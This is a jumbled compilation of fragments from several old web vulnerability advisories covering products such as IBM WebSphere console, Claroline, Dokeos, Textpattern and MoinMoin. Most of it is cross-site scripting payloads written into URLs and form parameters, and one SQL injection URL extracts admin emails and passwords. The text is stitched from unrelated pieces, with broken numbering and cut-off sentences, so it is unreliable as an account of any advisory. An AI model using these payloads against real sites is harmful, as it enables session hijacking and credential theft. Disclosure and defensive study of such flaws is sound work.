Attacker can inject XSS in URL string.
Example:
http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>
http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>.jsp
Using this vulnerability, an attacker can steal the admin's cookie and then authenticate as administrator.
2. PlantsByWebSphere Sample multiple XSS vulnerabilities.
Attacker can inject XSS in URL string.
Example:
http://[server]/console/portal/"><script>alert('DSecRG XSS')</script><!--
2. Multiple Stored XSS vulnerabilities found in script
/console/portal/Server/Monitoring
3.1. SQL Injection in "/ansFAQ.asp" in "id" parameter. Reflected XSS attack in "/ansFAQ.asp" in "topic" and "button" parameters.
-------------
Find Admin's password:
http://[URL]/ansFAQ.asp?id=-2 union select email,password from [user] where email like '%25admin%25'
XSS attacks:
http://[URL]/ansFAQ.asp?id=1&topic=</title><script>alert('sdl BugReport.IR XSS')</script>
http://[URL]/ansFAQ.asp?id=1&button="><script>alert('sdl BugReport.IR XSS')</script>
-------------
3.2. SQL Injection in "preview.asp" in "template_id" parameter.
-------------
Find Admin's password:
POST parameters "tasks_perpage", "time_zone", "account_enabled", "notify_own".
Example:
tasks_perpage = <script>alert('DSecRG XSS')</script>
time_zone = <img src="javascript:alert('DSecRG XSS')">
1.2 Vulnerabilities found in script index.php?do=admin&area=newproject.
1.5 Linked XSS in Path vulnerability found in index.php and slim.php.
Example:
http://[server]/[installdir]/index.php/"><script>alert('DSecRG XSS')</script>
---------------------------------------------------------------------
2. Stored XSS
parameter name = contentshort
parameter name = contentfull
Example:
contentshort=<script>alert('DSecRG XSS')</script>
contentfull=<script>alert('DSecRG XSS')</script>
1.2 Vulnerability in script http://[server]/[installdir]/2z/admin.php?mod=pm&action=write
Attacker can inject XSS in GET parameter "url"
Example:
http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBImageViewer.php?url=<script>alert('DSecRG XSS')</script>
2.2 Linked XSS vulnerability found in page /system/actionspages/_b/contentFiles/gBselectorContents.php
Attacker can inject XSS in GET parameter "ForEditor".
Attacker can inject XSS in URL string.
Example:
http://[server]/[installdir]/claroline/calendar/myagenda.php?"><script>alert('DSecRG XSS')</script>
http://[server]/[installdir]/claroline/user/user.php?"><script>alert('DSecRG XSS')</script>
1.2 Linked XSS vulnerability found in claroline/tracking/courseLog.php
Attacker can inject XSS in URL string.
Example:
http://[server]/[installdir]/claroline/course/index.php?"><script>alert('DSecRG XSS')</script>
http://[server]/[installdir]/claroline/phpbb/newtopic.php?"><script>alert('DSecRG XSS')</script>
1.2 Linked XSS vulnerability found in claroline/document/rqmkhtml.php
2. Linked XSS vulnerability found in /textpattern/setup/index.php, attacker can inject XSS in URL string.
Example:
http://[server]/[installdir]/textpattern/setup/index.php/"><script>alert('DSecRG XSS')</script>
--------------------------------------------------------------------------------------------
3. XSS in POST
Linked XSS vulnerability found in scripts:
user/help/help.shtml
user/help/general_help_user.shtml
Attacker can inject XSS script in URL.
Example:
http://[server]/user/help/help.shtml?<script>alert('DSecRG XSS')</script>
http://[server]/user/help/general_help_user.shtml?<script>alert('DSecRG XSS')</script>
<input type=submit name=submit_for_rating value="Go!">
</form>
-------------
3.3. Reflected XSS attack in "/login.php" in URL parameters.
-------------
http://[URL]/login.php?Fake=<fake><script>alert(/sdl BugReport.IR xss/)</script>
-------------
3.4. Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.
-------------
http://[URL]/hta/htmlarea.js.php?glb_sid=<script>alert(/sdl BugReport.IR xss/)</script>
-------------
4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php; attacker can inject XSS in parameter courseCode
Example:
http://[server]/[installdir]/main/calendar/myagenda.php?courseCode="><script>alert('DSecRG XSS')</script>
4.2 Linked XSS vulnerability found in main/admin/course_category.php; attacker can inject XSS in parameter category
/admin/credits.php
/upgrade/index.php
Example:
http://[server]/[installdir]/admin/login.php/"><script>alert("DSecRG XSS")</script>
http://[server]/[installdir]/upgrade/index.php/"><IMG SRC="javascript:alert('DSecRG XSS')
---------------------------------------------------------------------
Vendor Fix: Upgrade to version 1.8.1
Public Posting: 01-19-09
Example:
http://moinmo.in/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script>
GET parameter "Attach_Id"
Example:
http://[server]/[installdir]/operator/article/article_attachment.asp?Attach_Id="<script>alert('DSecRG XSS')</script>
About
*****
Linked XSS vulnerability found in script /cgi-bin/bgplg; attacker can inject XSS in parameter cmd
Example:
http://[server]/cgi-bin/bgplg?cmd=shov+version<script>alert('DSecRG XSS')</script>
Fix Information
***************
> Linked XSS vulnerability found in script /cgi-bin/bgplg attacker can inject XSS in parameter cmd
> Example:
> http://[server]/cgi-bin/bgplg?cmd=shov+version<script>alert('DSecRG XSS')</script>
> Fix Information
> ***************
Linked XSS vulnerability found in action.php, attacker can inject XSS in URL string:
Example:
http://[server]/[installdir]/action.php/"><script>alert('DSecRG XSS')</script>
Fix Information
***************
above and then fill ?? with
the user id of the admin which is the same process).
+--> Exploiting The Stored XSS Vulnerability:
It can be exploited by posting a vector like "<script>alert('Stored
XSS')</script>" to the forum.
(see "<SRC_DIR>/BlazeApps/Usercontrols/Forum/addpost.ascx.vb")
####################
- Solution:
####################
This is not a bug as the administrator should be able to name f.ex. his smilies anything he wants to do!
Then the Administrator can also write XSS in his usertitle and report that as a vulnerability? I see it more like a function rather than a vulnerability, cause!
If an admin makes a new custom template with custom html code, then that admin can put <script>alert('omg xss')</script> if he wants to. It's simply just functionality not bugs.
I hope you understand my concern and why it is important for me to say that this is not a bug.
Best Regards,
Exploit
http://server/<document
root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non
persistant XSS");</SCRIPT><!--&date=0000000000000
http://server/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non
Persistant XSS");</SCRIPT>
http://server/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod=none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant
Cross Site Scripting Vulnerabilities:
------------------------------------------------------------
http://vulnerable-site.com/wiki/NewGroup.jsp?group=Test
Vulnerable Parameters:
group=Test"<script>alert("Test+XSS")</script>
members= Test"<script>alert("Test+XSS")</script>
Type: Reflective
------------------------------------------------------------
http://vulnerable-site.com/wiki/Edit.jsp?page=Main&action=save&edittime=1186698299838&addr=127.0.0.1&_editedtext=Test&changenote=Test&ok=Save
Remote: Yes
Credit: Yaniv Miron
Exploit:
http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test
XSS')</script>
Yaniv Miron aka "Lament".
lament@ilhack.org